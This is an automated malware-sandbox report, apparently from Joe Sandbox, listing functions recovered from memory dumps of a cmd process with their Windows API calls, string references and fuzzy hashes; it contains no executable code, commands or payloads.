Associated: 00000013.00000002.2985211590.0000022413900000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000013.00000002.2987944500.0000022413915000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000013.00000002.2989139786.0000022413920000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000013.00000002.2990508739.0000022413922000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000013.00000002.2991786558.0000022413929000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_22413900000_cmd.jbxd

Similarity

API ID: CurrentThread
String ID:
API String ID: 2882836952-0
Opcode ID: f9fafa43fcee67a3a7710958ae0696c6d862f57b4097daa19824d4405277cc21
Instruction ID: 40f88bbaf512151c2a1402632e7c92ec5679491f571eb2ba56072fe7e171ed39
Opcode Fuzzy Hash: f9fafa43fcee67a3a7710958ae0696c6d862f57b4097daa19824d4405277cc21
Instruction Fuzzy Hash: 2261C836529A44D6EB60EB95E45831ABBE5F388758F100115FE8D8BBACDB7CC5A0CB04

Function 0000022413935E50 Relevance: 7.6, APIs: 5, Instructions: 124threadCOMMON

Download Yara Rule

APIs

GetCurrentThreadId.KERNEL32 ref: 0000022413935E66

Memory Dump Source

Source File: 00000013.00000002.2994535637.0000022413931000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000022413930000, based on PE: true

Associated: 00000013.00000002.2993151918.0000022413930000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000013.00000002.2996214908.0000022413945000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000013.00000002.2997607093.0000022413950000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000013.00000002.2998872667.0000022413952000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000013.00000002.3000146971.0000022413959000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_22413930000_cmd.jbxd

Similarity

API ID: CurrentThread
String ID:
API String ID: 2882836952-0
Opcode ID: f9fafa43fcee67a3a7710958ae0696c6d862f57b4097daa19824d4405277cc21
Instruction ID: b150e6e6ddeb64847b2a31420f68e603a59a41bb9ad175384987a3c2e84b2fdf
Opcode Fuzzy Hash: f9fafa43fcee67a3a7710958ae0696c6d862f57b4097daa19824d4405277cc21
Instruction Fuzzy Hash: 76619C76529B44D6EB609B65E59831ABBE1F388748F100116EE8D4BBACDB7CC5A0CB40

Function 0000022413903EC8 Relevance: 7.5, APIs: 5, Instructions: 47COMMON

Download Yara Rule

APIs

GetModuleHandleW.KERNEL32(?,?,?,?,?,0000022413903A5B), ref: 0000022413903EDB
GetCurrentProcess.KERNEL32(?,?,?,?,?,0000022413903A5B), ref: 0000022413903F0E
VirtualProtectEx.KERNEL32(?,?,?,?,?,0000022413903A5B), ref: 0000022413903F2E
GetCurrentProcess.KERNEL32(?,?,?,?,?,0000022413903A5B), ref: 0000022413903F47
VirtualProtectEx.KERNEL32(?,?,?,?,?,0000022413903A5B), ref: 0000022413903F68

Memory Dump Source

Source File: 00000013.00000002.2986413017.0000022413901000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000022413900000, based on PE: true

Associated: 00000013.00000002.2985211590.0000022413900000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000013.00000002.2987944500.0000022413915000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000013.00000002.2989139786.0000022413920000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000013.00000002.2990508739.0000022413922000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000013.00000002.2991786558.0000022413929000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_22413900000_cmd.jbxd

Similarity

API ID: CurrentProcessProtectVirtual$HandleModule
String ID:
API String ID: 1092925422-0
Opcode ID: 8f39ec8e8825e7e8b48ed506b15ed582bafad4aa87a5a48c909f13f5417d00ae
Instruction ID: 9fab67c08efdb61fb88663f76d4e8fee7c99f16c47f0cc3da182d367a681a429
Opcode Fuzzy Hash: 8f39ec8e8825e7e8b48ed506b15ed582bafad4aa87a5a48c909f13f5417d00ae
Instruction Fuzzy Hash: 58113026615740E3FF24ABA1E44821A7BB4FB44B98F080126DE4D0B79CEB7DC9E4C784

Function 0000022413933EC8 Relevance: 7.5, APIs: 5, Instructions: 47COMMON

Download Yara Rule

APIs

GetModuleHandleW.KERNEL32(?,?,?,?,?,0000022413933A5B), ref: 0000022413933EDB
GetCurrentProcess.KERNEL32(?,?,?,?,?,0000022413933A5B), ref: 0000022413933F0E
VirtualProtectEx.KERNEL32(?,?,?,?,?,0000022413933A5B), ref: 0000022413933F2E
GetCurrentProcess.KERNEL32(?,?,?,?,?,0000022413933A5B), ref: 0000022413933F47
VirtualProtectEx.KERNEL32(?,?,?,?,?,0000022413933A5B), ref: 0000022413933F68

Memory Dump Source

Source File: 00000013.00000002.2994535637.0000022413931000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000022413930000, based on PE: true

Associated: 00000013.00000002.2993151918.0000022413930000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000013.00000002.2996214908.0000022413945000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000013.00000002.2997607093.0000022413950000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000013.00000002.2998872667.0000022413952000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000013.00000002.3000146971.0000022413959000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_22413930000_cmd.jbxd

Similarity

API ID: CurrentProcessProtectVirtual$HandleModule
String ID:
API String ID: 1092925422-0
Opcode ID: 8f39ec8e8825e7e8b48ed506b15ed582bafad4aa87a5a48c909f13f5417d00ae
Instruction ID: b3ae4cdf9310d86cc8b91dbea02ae17f13e4abaac1af2030b671ed6ce5623a06
Opcode Fuzzy Hash: 8f39ec8e8825e7e8b48ed506b15ed582bafad4aa87a5a48c909f13f5417d00ae
Instruction Fuzzy Hash: FD111226615740E3FF34ABA1E54821A7BB0FB45B88F440126DE4D0B7ACEB7DC9A4C784

Function 0000022413908CA0 Relevance: 7.2, APIs: 3, Strings: 1, Instructions: 154COMMON

Download Yara Rule

APIs

__except_validate_context_record.LIBVCRUNTIME ref: 0000022413908CCB
_IsNonwritableInCurrentImage.LIBCMT ref: 0000022413908D62
RtlUnwindEx.NTDLL ref: 0000022413908DBC

Strings

csm, xrefs: 0000022413908D49

Memory Dump Source

Source File: 00000013.00000002.2986413017.0000022413901000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000022413900000, based on PE: true

Associated: 00000013.00000002.2985211590.0000022413900000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000013.00000002.2987944500.0000022413915000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000013.00000002.2989139786.0000022413920000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000013.00000002.2990508739.0000022413922000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000013.00000002.2991786558.0000022413929000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_22413900000_cmd.jbxd

Similarity

API ID: CurrentImageNonwritableUnwind__except_validate_context_record
String ID: csm
API String ID: 2395640692-1018135373
Opcode ID: b80ff68eb806cf2b6af9fc4dc9cc0d46113cdbfcc8a0c2797bbdc03f84945619
Instruction ID: f29c5e48f414a320111330a9cd9926e9adcb18cc0caf21a33b828ca5adad7c9b
Opcode Fuzzy Hash: b80ff68eb806cf2b6af9fc4dc9cc0d46113cdbfcc8a0c2797bbdc03f84945619
Instruction Fuzzy Hash: 5A519C33329600AAEF54EB95E448B6C7F99E754B9CF1581209E5E4F78CDB78C8A1C700

Function 0000022413938CA0 Relevance: 7.2, APIs: 3, Strings: 1, Instructions: 154COMMON

Download Yara Rule

APIs

__except_validate_context_record.LIBVCRUNTIME ref: 0000022413938CCB
_IsNonwritableInCurrentImage.LIBCMT ref: 0000022413938D62
RtlUnwindEx.NTDLL ref: 0000022413938DBC

Strings

csm, xrefs: 0000022413938D49

Memory Dump Source

Source File: 00000013.00000002.2994535637.0000022413931000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000022413930000, based on PE: true

Associated: 00000013.00000002.2993151918.0000022413930000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000013.00000002.2996214908.0000022413945000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000013.00000002.2997607093.0000022413950000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000013.00000002.2998872667.0000022413952000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000013.00000002.3000146971.0000022413959000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_22413930000_cmd.jbxd

Similarity

API ID: CurrentImageNonwritableUnwind__except_validate_context_record
String ID: csm
API String ID: 2395640692-1018135373
Opcode ID: b80ff68eb806cf2b6af9fc4dc9cc0d46113cdbfcc8a0c2797bbdc03f84945619
Instruction ID: cee73cb8460090dd7a0ca387e50b8e6c93f35da2742172f829457802e189e503
Opcode Fuzzy Hash: b80ff68eb806cf2b6af9fc4dc9cc0d46113cdbfcc8a0c2797bbdc03f84945619
Instruction Fuzzy Hash: 7E51A07322A600AADF64EBA5E548B6D7F91E354B8CF148110DE5E4F7ACDB78C8A5C700

Function 000002241390AAAC Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 146COMMON

Download Yara Rule

APIs

__except_validate_context_record.LIBVCRUNTIME ref: 000002241390AAD4
__FrameHandler3::FrameUnwindToEmptyState.LIBVCRUNTIME ref: 000002241390ABBC

Strings

csm, xrefs: 000002241390AAF6
csm, xrefs: 000002241390AC0E

Memory Dump Source

Source File: 00000013.00000002.2986413017.0000022413901000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000022413900000, based on PE: true

Associated: 00000013.00000002.2985211590.0000022413900000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000013.00000002.2987944500.0000022413915000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000013.00000002.2989139786.0000022413920000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000013.00000002.2990508739.0000022413922000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000013.00000002.2991786558.0000022413929000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_22413900000_cmd.jbxd

Similarity

API ID: Frame$EmptyHandler3::StateUnwind__except_validate_context_record
String ID: csm$csm
API String ID: 3896166516-3733052814
Opcode ID: eaa3ef4f1944c03eb6c37dfa640564b8b9e6afec5d94ced6829f034688bc3bbb
Instruction ID: 4c6183dcf0a36d8c5727a2f6a055d6d2d9b0a9c0fe61a65d6f06af10eac00d54
Opcode Fuzzy Hash: eaa3ef4f1944c03eb6c37dfa640564b8b9e6afec5d94ced6829f034688bc3bbb
Instruction Fuzzy Hash: FB518F32120281ABFF74ABA595483587BA9F354B98F154216DE9D4BB99CB3CC4E0C781

Function 000002241390A6FC Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 146COMMON

Download Yara Rule

APIs

EncodePointer.KERNEL32 ref: 000002241390A75B
_CallSETranslator.LIBVCRUNTIME ref: 000002241390A7A7

Strings

MOC, xrefs: 000002241390A76F
RCC, xrefs: 000002241390A777

Memory Dump Source

Source File: 00000013.00000002.2986413017.0000022413901000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000022413900000, based on PE: true

Associated: 00000013.00000002.2985211590.0000022413900000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000013.00000002.2987944500.0000022413915000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000013.00000002.2989139786.0000022413920000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000013.00000002.2990508739.0000022413922000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000013.00000002.2991786558.0000022413929000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_22413900000_cmd.jbxd

Similarity

API ID: CallEncodePointerTranslator
String ID: MOC$RCC
API String ID: 3544855599-2084237596
Opcode ID: 17958f67cb0a17abd9ffe4ca5dea2288dd301e2c3aed8a7adc88a0e8f0f7cfb5
Instruction ID: 7f6c8823b8395a0b983c24e37b1afa2663760c937b366d21dcfc1d8b0e617134
Opcode Fuzzy Hash: 17958f67cb0a17abd9ffe4ca5dea2288dd301e2c3aed8a7adc88a0e8f0f7cfb5
Instruction Fuzzy Hash: B761AC32528BC491EB20AF65E44479ABBA4F784B98F044215EFDC1BB99DB3CC0E0CB40

Function 00000224138D9EAC Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 146COMMON

Download Yara Rule

APIs

__except_validate_context_record.LIBVCRUNTIME ref: 00000224138D9ED4
__FrameHandler3::FrameUnwindToEmptyState.LIBVCRUNTIME ref: 00000224138D9FBC

Strings

csm, xrefs: 00000224138D9EF6
csm, xrefs: 00000224138DA00E

Memory Dump Source

Source File: 00000013.00000003.2594733035.00000224138D0000.00000040.00000400.00020000.00000000.sdmp, Offset: 00000224138D0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_3_224138d0000_cmd.jbxd

Similarity

API ID: Frame$EmptyHandler3::StateUnwind__except_validate_context_record
String ID: csm$csm
API String ID: 3896166516-3733052814
Opcode ID: eaa3ef4f1944c03eb6c37dfa640564b8b9e6afec5d94ced6829f034688bc3bbb
Instruction ID: 5d32d3d82a8f4b3e651e4303e9f6b8589f3073ff91bf5acac5217a4a16babfb0
Opcode Fuzzy Hash: eaa3ef4f1944c03eb6c37dfa640564b8b9e6afec5d94ced6829f034688bc3bbb
Instruction Fuzzy Hash: EA515B32204280EAEF74AFA5E548358BBE1E355B98F244115DA9D4FB95CB38E8E0CB41

Function 000002241393AAAC Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 146COMMON

Download Yara Rule

APIs

__except_validate_context_record.LIBVCRUNTIME ref: 000002241393AAD4
__FrameHandler3::FrameUnwindToEmptyState.LIBVCRUNTIME ref: 000002241393ABBC

Strings

csm, xrefs: 000002241393AC0E
csm, xrefs: 000002241393AAF6

Memory Dump Source

Source File: 00000013.00000002.2994535637.0000022413931000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000022413930000, based on PE: true

Associated: 00000013.00000002.2993151918.0000022413930000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000013.00000002.2996214908.0000022413945000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000013.00000002.2997607093.0000022413950000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000013.00000002.2998872667.0000022413952000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000013.00000002.3000146971.0000022413959000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_22413930000_cmd.jbxd

Similarity

API ID: Frame$EmptyHandler3::StateUnwind__except_validate_context_record
String ID: csm$csm
API String ID: 3896166516-3733052814
Opcode ID: eaa3ef4f1944c03eb6c37dfa640564b8b9e6afec5d94ced6829f034688bc3bbb
Instruction ID: ee1abaaf2dfbdb1c1c46bb78de78b7288e762e3f5d27076a146f20e85247ee3e
Opcode Fuzzy Hash: eaa3ef4f1944c03eb6c37dfa640564b8b9e6afec5d94ced6829f034688bc3bbb
Instruction Fuzzy Hash: A15170B2920680ABFF74ABB596483587BA1F354B98F144115DE8D4BBA9CB3CC8E0C701

Function 000002241393A6FC Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 146COMMON

Download Yara Rule

APIs

EncodePointer.KERNEL32 ref: 000002241393A75B
_CallSETranslator.LIBVCRUNTIME ref: 000002241393A7A7

Strings

RCC, xrefs: 000002241393A777
MOC, xrefs: 000002241393A76F

Memory Dump Source

Source File: 00000013.00000002.2994535637.0000022413931000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000022413930000, based on PE: true

Associated: 00000013.00000002.2993151918.0000022413930000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000013.00000002.2996214908.0000022413945000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000013.00000002.2997607093.0000022413950000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000013.00000002.2998872667.0000022413952000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000013.00000002.3000146971.0000022413959000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_22413930000_cmd.jbxd

Similarity

API ID: CallEncodePointerTranslator
String ID: MOC$RCC
API String ID: 3544855599-2084237596
Opcode ID: 17958f67cb0a17abd9ffe4ca5dea2288dd301e2c3aed8a7adc88a0e8f0f7cfb5
Instruction ID: bb4eb9c6bdce0418474fd4538fa7d0d2fc701835a97049d7c44317ee791c0f2d
Opcode Fuzzy Hash: 17958f67cb0a17abd9ffe4ca5dea2288dd301e2c3aed8a7adc88a0e8f0f7cfb5
Instruction Fuzzy Hash: 1361A4B2914BC495EF209F65E54439ABBA0F785798F044215EF9D17B69DB7CC1E0CB00

Function 0000022413903950 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 55COMMON

Download Yara Rule

APIs

StrCmpNW.SHLWAPI ref: 0000022413903972
StrStrW.SHLWAPI ref: 0000022413903990
StrToIntW.SHLWAPI ref: 00000224139039B7

Part of subcall function 0000022413901A30: OpenProcess.KERNEL32 ref: 0000022413901A56
Part of subcall function 0000022413901A30: K32GetModuleFileNameExW.KERNEL32 ref: 0000022413901A74
Part of subcall function 0000022413901A30: PathFindFileNameW.SHLWAPI ref: 0000022413901A83
Part of subcall function 0000022413901A30: lstrlenW.KERNEL32 ref: 0000022413901A8F
Part of subcall function 0000022413901A30: StrCpyW.SHLWAPI ref: 0000022413901AA2
Part of subcall function 0000022413901A30: CloseHandle.KERNEL32 ref: 0000022413901AB0

Part of subcall function 0000022413903F88: StrCmpNIW.SHLWAPI(?,?,?,000002241390272F), ref: 0000022413903FA0

Strings

pid_, xrefs: 0000022413903968

Memory Dump Source

Source File: 00000013.00000002.2986413017.0000022413901000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000022413900000, based on PE: true

Associated: 00000013.00000002.2985211590.0000022413900000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000013.00000002.2987944500.0000022413915000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000013.00000002.2989139786.0000022413920000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000013.00000002.2990508739.0000022413922000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000013.00000002.2991786558.0000022413929000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_22413900000_cmd.jbxd

Similarity

API ID: FileName$CloseFindHandleModuleOpenPathProcesslstrlen
String ID: pid_
API String ID: 517849248-4147670505
Opcode ID: 351c56d785df20298bfbc2128b4df5e5f7d51d179e69475368e405930b6507af
Instruction ID: 3611ceec56e323fc947161139e53b622406e43c6aa7511f1765b8d6c23399bf2
Opcode Fuzzy Hash: 351c56d785df20298bfbc2128b4df5e5f7d51d179e69475368e405930b6507af
Instruction Fuzzy Hash: 5E118411330B81B1FF10ABA5E84D35B7AA8F748788F844425EE4D9B69CEF68CDA5C740

Function 0000022413933950 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 55COMMON

Download Yara Rule

APIs

StrCmpNW.SHLWAPI ref: 0000022413933972
StrStrW.SHLWAPI ref: 0000022413933990
StrToIntW.SHLWAPI ref: 00000224139339B7

Part of subcall function 0000022413931A30: OpenProcess.KERNEL32 ref: 0000022413931A56
Part of subcall function 0000022413931A30: K32GetModuleFileNameExW.KERNEL32 ref: 0000022413931A74
Part of subcall function 0000022413931A30: PathFindFileNameW.SHLWAPI ref: 0000022413931A83
Part of subcall function 0000022413931A30: lstrlenW.KERNEL32 ref: 0000022413931A8F
Part of subcall function 0000022413931A30: StrCpyW.SHLWAPI ref: 0000022413931AA2
Part of subcall function 0000022413931A30: CloseHandle.KERNEL32 ref: 0000022413931AB0

Part of subcall function 0000022413933F88: StrCmpNIW.SHLWAPI(?,?,?,000002241393272F), ref: 0000022413933FA0

Strings

pid_, xrefs: 0000022413933968

Memory Dump Source

Source File: 00000013.00000002.2994535637.0000022413931000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000022413930000, based on PE: true

Associated: 00000013.00000002.2993151918.0000022413930000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000013.00000002.2996214908.0000022413945000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000013.00000002.2997607093.0000022413950000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000013.00000002.2998872667.0000022413952000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000013.00000002.3000146971.0000022413959000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_22413930000_cmd.jbxd

Similarity

API ID: FileName$CloseFindHandleModuleOpenPathProcesslstrlen
String ID: pid_
API String ID: 517849248-4147670505
Opcode ID: 351c56d785df20298bfbc2128b4df5e5f7d51d179e69475368e405930b6507af
Instruction ID: 49a6605f66453eff468d2f8e1539a94aa27cd82fad4c9b8cc26adac6d25f5cff
Opcode Fuzzy Hash: 351c56d785df20298bfbc2128b4df5e5f7d51d179e69475368e405930b6507af
Instruction Fuzzy Hash: B4117591320781B1FF10BBB5EA4935A7AA4F744748F8040259E4DCB7ACEF68CDA5C700

Function 0000022413911FA8 Relevance: 6.3, APIs: 4, Instructions: 304fileCOMMON

Download Yara Rule

APIs

GetConsoleOutputCP.KERNEL32 ref: 0000022413912027
WriteFile.KERNEL32 ref: 0000022413912304
WriteFile.KERNEL32 ref: 000002241391234A
GetLastError.KERNEL32 ref: 0000022413912409

Memory Dump Source

Source File: 00000013.00000002.2986413017.0000022413901000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000022413900000, based on PE: true

Associated: 00000013.00000002.2985211590.0000022413900000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000013.00000002.2987944500.0000022413915000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000013.00000002.2989139786.0000022413920000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000013.00000002.2990508739.0000022413922000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000013.00000002.2991786558.0000022413929000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_22413900000_cmd.jbxd

Similarity

API ID: FileWrite$ConsoleErrorLastOutput
String ID:
API String ID: 2718003287-0
Opcode ID: 6e2b0015a5e192ecbb3898a491d5c4d6065fa3f656e88a841fb9fa74fea56143
Instruction ID: e90e25d722bc9b7c059eedbecd0ddb1c3ae8768c5d7eb752f8140c16410a34fd
Opcode Fuzzy Hash: 6e2b0015a5e192ecbb3898a491d5c4d6065fa3f656e88a841fb9fa74fea56143
Instruction Fuzzy Hash: E9D1F372724A8499EB11EFA5D4443DC3BB1F344BACF404156CE9EABB99DB34C4A6C340

Function 0000022413941FA8 Relevance: 6.3, APIs: 4, Instructions: 304fileCOMMON

Download Yara Rule

APIs

GetConsoleOutputCP.KERNEL32 ref: 0000022413942027
WriteFile.KERNEL32 ref: 0000022413942304
WriteFile.KERNEL32 ref: 000002241394234A
GetLastError.KERNEL32 ref: 0000022413942409

Memory Dump Source

Source File: 00000013.00000002.2994535637.0000022413931000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000022413930000, based on PE: true

Associated: 00000013.00000002.2993151918.0000022413930000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000013.00000002.2996214908.0000022413945000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000013.00000002.2997607093.0000022413950000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000013.00000002.2998872667.0000022413952000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000013.00000002.3000146971.0000022413959000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_22413930000_cmd.jbxd

Similarity

API ID: FileWrite$ConsoleErrorLastOutput
String ID:
API String ID: 2718003287-0
Opcode ID: 6e2b0015a5e192ecbb3898a491d5c4d6065fa3f656e88a841fb9fa74fea56143
Instruction ID: c6b735cc79f61ca4d76ef9804721cc578e0c1a7a6758db37dc559cb32d37723e
Opcode Fuzzy Hash: 6e2b0015a5e192ecbb3898a491d5c4d6065fa3f656e88a841fb9fa74fea56143
Instruction Fuzzy Hash: 05D1E032724A8499EB10DFF5E6482EC3BB1F354B9CF404256DE9D9BB99DA34C1A6C340

Function 00000224139014A0 Relevance: 6.3, APIs: 5, Instructions: 40memoryCOMMON

Download Yara Rule

APIs

GetProcessHeap.KERNEL32 ref: 00000224139014C6
HeapFree.KERNEL32 ref: 00000224139014D5
GetProcessHeap.KERNEL32 ref: 00000224139014E2
HeapFree.KERNEL32 ref: 00000224139014F1
GetProcessHeap.KERNEL32 ref: 0000022413901501

Memory Dump Source

Source File: 00000013.00000002.2986413017.0000022413901000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000022413900000, based on PE: true

Associated: 00000013.00000002.2985211590.0000022413900000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000013.00000002.2987944500.0000022413915000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000013.00000002.2989139786.0000022413920000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000013.00000002.2990508739.0000022413922000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000013.00000002.2991786558.0000022413929000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_22413900000_cmd.jbxd

Similarity

API ID: Heap$Process$Free
String ID:
API String ID: 3168794593-0
Opcode ID: cb2f76e5a78e817a83185cac88bc62ecdb24cbc77a47800d9d0442b9e443284d
Instruction ID: 06ef5d83edd5f3a03675846f7866c53c974332197a394339226ba4a2d81d23e1
Opcode Fuzzy Hash: cb2f76e5a78e817a83185cac88bc62ecdb24cbc77a47800d9d0442b9e443284d
Instruction Fuzzy Hash: B6014032620B90EADB55EFA6E80814A7BA5F788F94F0A4025DF4D5772CDF34D4A1C740

Function 00000224139314A0 Relevance: 6.3, APIs: 5, Instructions: 40memoryCOMMON

Download Yara Rule

APIs

GetProcessHeap.KERNEL32 ref: 00000224139314C6
HeapFree.KERNEL32 ref: 00000224139314D5
GetProcessHeap.KERNEL32 ref: 00000224139314E2
HeapFree.KERNEL32 ref: 00000224139314F1
GetProcessHeap.KERNEL32 ref: 0000022413931501

Memory Dump Source

Source File: 00000013.00000002.2994535637.0000022413931000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000022413930000, based on PE: true

Associated: 00000013.00000002.2993151918.0000022413930000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000013.00000002.2996214908.0000022413945000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000013.00000002.2997607093.0000022413950000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000013.00000002.2998872667.0000022413952000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000013.00000002.3000146971.0000022413959000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_22413930000_cmd.jbxd

Similarity

API ID: Heap$Process$Free
String ID:
API String ID: 3168794593-0
Opcode ID: cb2f76e5a78e817a83185cac88bc62ecdb24cbc77a47800d9d0442b9e443284d
Instruction ID: 18afde9bed60ccd935e5b55ec6f5e682db3d86c93d91e079319e42df8b0475ad
Opcode Fuzzy Hash: cb2f76e5a78e817a83185cac88bc62ecdb24cbc77a47800d9d0442b9e443284d
Instruction Fuzzy Hash: 0201ED72620B90EADB14EFA6E90815A7BA1F78CF84B054025DF4D57B2CDF34D4A1C740

Function 00000224139128F4 Relevance: 6.2, APIs: 4, Instructions: 229COMMON

Download Yara Rule

APIs

GetConsoleMode.KERNEL32(?,?,?,?,?,?,?,?,?,?,00000000,00000000,00000224139128DF), ref: 0000022413912A12

Memory Dump Source

Source File: 00000013.00000002.2986413017.0000022413901000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000022413900000, based on PE: true

Associated: 00000013.00000002.2985211590.0000022413900000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000013.00000002.2987944500.0000022413915000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000013.00000002.2989139786.0000022413920000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000013.00000002.2990508739.0000022413922000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000013.00000002.2991786558.0000022413929000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_22413900000_cmd.jbxd

Similarity

API ID: ConsoleMode
String ID:
API String ID: 4145635619-0
Opcode ID: 84db17c61f8644ba0c376578cd7e648754f889cd263a50ace8e4a54d342680a6
Instruction ID: 73093632e0e142b48e1b777c0bb633ff75799070bd1babf7f68400083f0437b1
Opcode Fuzzy Hash: 84db17c61f8644ba0c376578cd7e648754f889cd263a50ace8e4a54d342680a6
